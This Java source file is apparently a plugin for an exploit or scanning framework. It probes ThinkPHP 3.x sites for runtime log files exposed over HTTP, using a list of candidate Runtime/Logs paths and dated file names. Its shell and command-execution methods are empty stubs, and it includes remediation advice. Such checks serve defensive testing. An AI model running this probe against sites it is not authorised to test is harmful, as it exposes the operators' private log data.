package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;

import java.util.ArrayList;
import java.util.Date;

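/**
 * Checks whether a ThinkPHP 3.x site serves its runtime log files over HTTP
 * (log disclosure).
 *
 * <p>The check requests today's log file name under a fixed list of
 * {@code Runtime/Logs} directories and reports a finding when a response
 * contains a typical log marker. It only reads; {@link #exeVUL} and
 * {@link #getShell} are not applicable to this issue and always report failure.
 *
 * <p>Remediation for an affected site: deny web access to the {@code Runtime}
 * directory (or move it outside the document root). Requests for
 * {@code /Runtime/Logs/*.log} in the web server's access log are a useful
 * detection signal.
 *
 * @author 莲花 2021/6/27
 */
public class tp3_log implements BasePayload {
    /** Finding name reported in every {@link Result} of this check. */
    private static final String VULN_NAME = "ThinkPHP 3.x 日志泄露";

    /**
     * Substrings treated as evidence that the response is a log file.
     * Heuristic only: any page that happens to contain one of them also matches.
     */
    private static final String[] LOG_MARKERS = {"INFO:", "[ error ]"};

    /** Candidate log directories, probed in this order. */
    private static final String[] LOG_DIRS = {
        "/Runtime/Logs/",
        "/Runtime/Logs/Home/",
        "/Runtime/Logs/Common/",
        "/App/Runtime/Logs/",
        "/App/Runtime/Logs/Home/",
        "/Application/Runtime/Logs/",
        "/Application/Runtime/Logs/Admin/",
        "/Application/Runtime/Logs/Home/",
        "/Application/Runtime/Logs/App/",
        "/Application/Runtime/Logs/Ext/",
        "/Application/Runtime/Logs/Api/",
        "/Application/Runtime/Logs/Test/",
        "/Application/Runtime/Logs/Common/",
        "/Application/Runtime/Logs/Service/",
    };

    /** Connect and read timeout per request, so one unresponsive host cannot stall the check. */
    private static final int TIMEOUT_MS = 10000;

    /**
     * Probes the candidate log locations under {@code url}.
     *
     * @param url base URL of the site under test; trailing slashes are ignored
     * @return a positive {@link Result} carrying the first URL whose response looks
     *         like a log file, otherwise a negative result with an empty detail
     * @throws Exception declared by {@link BasePayload}; request failures are handled
     *         per candidate and do not propagate
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        if (url == null || url.trim().isEmpty()) {
            return new Result(false, VULN_NAME, "");
        }

        // Avoid "//Runtime/..." when the caller passes a base URL ending in '/'.
        String base = url.trim();
        while (base.endsWith("/")) {
            base = base.substring(0, base.length() - 1);
        }

        Date now = new Date();
        // Locale.ROOT keeps the name ASCII and Gregorian; the default locale can
        // yield a different calendar year or non-ASCII digits.
        // NOTE(review): the date comes from the local clock and time zone; a server
        // in another zone may name today's log differently -- confirm.
        String datedName = String.format(java.util.Locale.ROOT, "%1$ty_%1$tm_%1$td.log", now);
        // Same name prefixed with the current Unix time in seconds.
        // NOTE(review): presumably targets rotated logs; it can only match a file
        // stamped with exactly this second -- confirm this probe is still wanted.
        String stampedName = (now.getTime() / 1000L) + "-" + datedName;

        ArrayList<String> candidates = new ArrayList<String>(LOG_DIRS.length * 2);
        for (String dir : LOG_DIRS) {
            candidates.add(base + dir + datedName);
            candidates.add(base + dir + stampedName);
        }

        for (String candidate : candidates) {
            // Handle failures per request: one refused or timed-out connection must
            // not abort the remaining candidates and produce a false negative.
            try {
                HttpRequest request = HttpRequest.get(candidate)
                        .connectTimeout(TIMEOUT_MS)
                        .readTimeout(TIMEOUT_MS);
                // Only a 200 response counts; error pages that echo a marker
                // would otherwise be reported as a leak.
                if (!request.ok()) {
                    continue;
                }
                String body = request.body();
                if (body != null && containsLogMarker(body)) {
                    return new Result(true, VULN_NAME, candidate);
                }
            } catch (Exception e) {
                System.err.println("tp3_log: request failed for " + candidate + ": " + e);
            }
        }

        return new Result(false, VULN_NAME, "");
    }

    /** Returns true when {@code body} contains any of {@link #LOG_MARKERS}. */
    private static boolean containsLogMarker(String body) {
        for (String marker : LOG_MARKERS) {
            if (body.contains(marker)) {
                return true;
            }
        }
        return false;
    }

    /**
     * Not applicable: a log disclosure offers no command execution.
     *
     * @return always a negative {@link Result} with empty fields
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, "", "");
    }

    /**
     * Not applicable to this check.
     *
     * @return always a negative {@link Result} with empty fields
     */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, "", "");
    }
}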
